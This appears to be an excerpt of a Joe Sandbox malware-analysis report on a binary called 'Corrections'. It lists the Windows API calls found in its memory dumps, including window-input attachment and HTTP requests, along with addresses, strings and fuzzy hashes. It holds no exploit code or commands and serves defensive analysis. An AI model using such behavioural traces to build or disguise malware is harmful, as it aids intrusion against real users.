                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E21D1B5901218BBCF05BBA0DC85EEEBBB8EF04350F104156F951A7295DB7A9908DB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 009B4539
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 009B453C
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 009B4563
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009B4586
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009B45FE
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 009B4648
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 009B4663
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 009B467E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 009B4692
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 009B46AF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 28c65c95b65fa335670e55b45ffe8b365daab9df2bfc678fac124021a8216f41
                                                                                                                                                                                                                                                                                            • Instruction ID: 70c0d535bf2bdf102f00089ec309804cee74a6b0e284437d17aba6de9af1bc71
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28c65c95b65fa335670e55b45ffe8b365daab9df2bfc678fac124021a8216f41
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED615A75A00208EFDB10DFA8CD81FEE77B8EB49714F104159FA14A72A2D7B4A945EB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0098BB18
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0098ABA8,?,00000001), ref: 0098BB2C
                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0098BB33
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0098ABA8,?,00000001), ref: 0098BB42
                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0098BB54
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0098ABA8,?,00000001), ref: 0098BB6D
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0098ABA8,?,00000001), ref: 0098BB7F
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0098ABA8,?,00000001), ref: 0098BBC4
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0098ABA8,?,00000001), ref: 0098BBD9
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0098ABA8,?,00000001), ref: 0098BBE4
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 36bb053266b674d2b93432535b07c721e7741d443e8386f73bdd3951df19f0c4
                                                                                                                                                                                                                                                                                            • Instruction ID: fb3d99da2be74971241396c4f07c8385ebf76e109bb69b5f4689196f3174483c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36bb053266b674d2b93432535b07c721e7741d443e8386f73bdd3951df19f0c4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0131D272928304AFDB10AB14DD84FBA3BADEB04322F184115FA05C72A0EB74EE40DB24
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00953007
                                                                                                                                                                                                                                                                                              • Part of subcall function 00952D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4), ref: 00952D4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00952D38: GetLastError.KERNEL32(009F1DC4,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4,009F1DC4), ref: 00952D60
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00953013
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095301E
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00953029
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00953034
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095303F
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095304A
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00953055
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00953060
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095306E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a786924c38f27c842081086e119472e56951b6feafb166bd528fabeb702ddcd9
                                                                                                                                                                                                                                                                                            • Instruction ID: 82df41b1767796bc7a8e3289b2bcf3564dd4d9192c728f3ed85a40cf08d45ba8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a786924c38f27c842081086e119472e56951b6feafb166bd528fabeb702ddcd9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F111F876100108BFCB01EF96C842EDD3BB5EF56351BA144A5FE089F272DA31EE599B90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00922AF9
                                                                                                                                                                                                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00922B98
                                                                                                                                                                                                                                                                                            • UnregisterHotKey.USER32(?), ref: 00922D7D
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00963A1B
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00963A80
                                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00963AAD
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                            • String ID: close all
                                                                                                                                                                                                                                                                                            • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                            • Opcode ID: c9e14a13b0698202a47c3e6c86f66f0e289c68d65b195b6ffc1ffa0466d334cf
                                                                                                                                                                                                                                                                                            • Instruction ID: 70fa5339c8538f4944aa55b52294d446a3ee0780836e7664ce62ff73037f0a90
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9e14a13b0698202a47c3e6c86f66f0e289c68d65b195b6ffc1ffa0466d334cf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54D1AE71705222DFCB28EF64D985B69F7A4FF44710F1182ADE94A6B2A5CB30AD12DF40
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009989F2
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00998A06
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00998A30
                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00998A4A
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00998A5C
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00998AA5
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00998AF5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                            • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                            • Opcode ID: df14b6e81583a75ad2651cf7418dcfa7f5b38f6126c698534483b3e98feb76a3
                                                                                                                                                                                                                                                                                            • Instruction ID: 7d61df0fafc360b81d664f617de47c65abbbbc225f9318f2c92fb6d4c3655762
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df14b6e81583a75ad2651cf7418dcfa7f5b38f6126c698534483b3e98feb76a3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA818E729042459BCF24EF58C484ABBB3E8BF8A310F584C1EF895D7251EB35E9458B92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 009274D7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00927567: GetClientRect.USER32(?,?), ref: 0092758D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00927567: GetWindowRect.USER32(?,?), ref: 009275CE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00927567: ScreenToClient.USER32(?,?), ref: 009275F6
                                                                                                                                                                                                                                                                                            • GetDC.USER32 ref: 00966083
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00966096
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 009660A4
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 009660B9
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 009660C1
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00966152
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                                                                                            • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                                            • Opcode ID: 712f1c953e860b6fbe8cd0a85ba139d0ae1aa5c77aa1ba01fb2ba09ab4e47b67
                                                                                                                                                                                                                                                                                            • Instruction ID: 428a47345efa18d06a1316c9a5c72f282abd0053d32f2fa0f5e3a6da89388060
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 712f1c953e860b6fbe8cd0a85ba139d0ae1aa5c77aa1ba01fb2ba09ab4e47b67
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8571E131508205EFCF21DFA4DD84AFA7BBAFF4A320F144669ED555A2A6C7358880EF50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0
                                                                                                                                                                                                                                                                                              • Part of subcall function 009219CD: GetCursorPos.USER32(?), ref: 009219E1
                                                                                                                                                                                                                                                                                              • Part of subcall function 009219CD: ScreenToClient.USER32(00000000,?), ref: 009219FE
                                                                                                                                                                                                                                                                                              • Part of subcall function 009219CD: GetAsyncKeyState.USER32(00000001), ref: 00921A23
                                                                                                                                                                                                                                                                                              • Part of subcall function 009219CD: GetAsyncKeyState.USER32(00000002), ref: 00921A3D
                                                                                                                                                                                                                                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 009B95C7
                                                                                                                                                                                                                                                                                            • ImageList_EndDrag.COMCTL32 ref: 009B95CD
                                                                                                                                                                                                                                                                                            • ReleaseCapture.USER32 ref: 009B95D3
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 009B966E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 009B9681
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 009B975B
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                                            • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                                            • Opcode ID: 6ddebdf7b8c0266404ec6a9a3b0782c6f919820def2c00295c99aec89f267eb1
                                                                                                                                                                                                                                                                                            • Instruction ID: 34b234798199e158c4ae429b3f1c1e00a6522721133cbee37bad74c55a728586
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ddebdf7b8c0266404ec6a9a3b0782c6f919820def2c00295c99aec89f267eb1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA51AD70118314AFD714EF20DD96FAA77E4FB88724F400A2CFA96972E2DB709944DB52
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0099CCB7
                                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0099CCDF
                                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0099CD0F
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0099CD67
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 0099CD7B
                                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0099CD86
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                            • Opcode ID: 90cbc34c3ef50bab0bfec6d3e3aedc54cf1a698e96195c85cf6d76907794e09b
                                                                                                                                                                                                                                                                                            • Instruction ID: 1a3f22055aa9d2fc2dd0062bbe4afeb7bed9c901e85a9ca3c9c8a581f17655f9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90cbc34c3ef50bab0bfec6d3e3aedc54cf1a698e96195c85cf6d76907794e09b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 103182F1505308AFEB21AF698D88AAB7FFCEB49754B10452DF446D3240EB34DD049B61
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009655AE,?,?,Bad directive syntax error,009BDCD0,00000000,00000010,?,?), ref: 0098A236
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,009655AE,?), ref: 0098A23D
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0098A301
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                            • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                            • Opcode ID: 8a841359f7a0e3ec75740ca288005d84636d45222657d2798f785ff05243f4a8
                                                                                                                                                                                                                                                                                            • Instruction ID: a45a3dad5c7a810a5082fc0030be13e7842fb5dd01402c5511251ac12baa5845
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a841359f7a0e3ec75740ca288005d84636d45222657d2798f785ff05243f4a8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B217E3280421EEFDF12BBA0DC06FEE7B79BF58704F044466F515650A2EB71AA18DB11
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 009829F8
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00982A0D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00982A9A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                            • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                            • Opcode ID: f14be9f1e292e319cc3d0dc743d4131728d739d56ded57a75b5b71c31da2de54
                                                                                                                                                                                                                                                                                            • Instruction ID: 3d857857567e27517b95897f7def152d21675ef0907faccfa946ee43050e1549
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f14be9f1e292e319cc3d0dc743d4131728d739d56ded57a75b5b71c31da2de54
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A511297664C707B9FA2D7321EC07EAA379C8F54B78B200122F905E41D1FB66AC005B14
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0092758D
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 009275CE
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 009275F6
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0092773A
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0092775B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
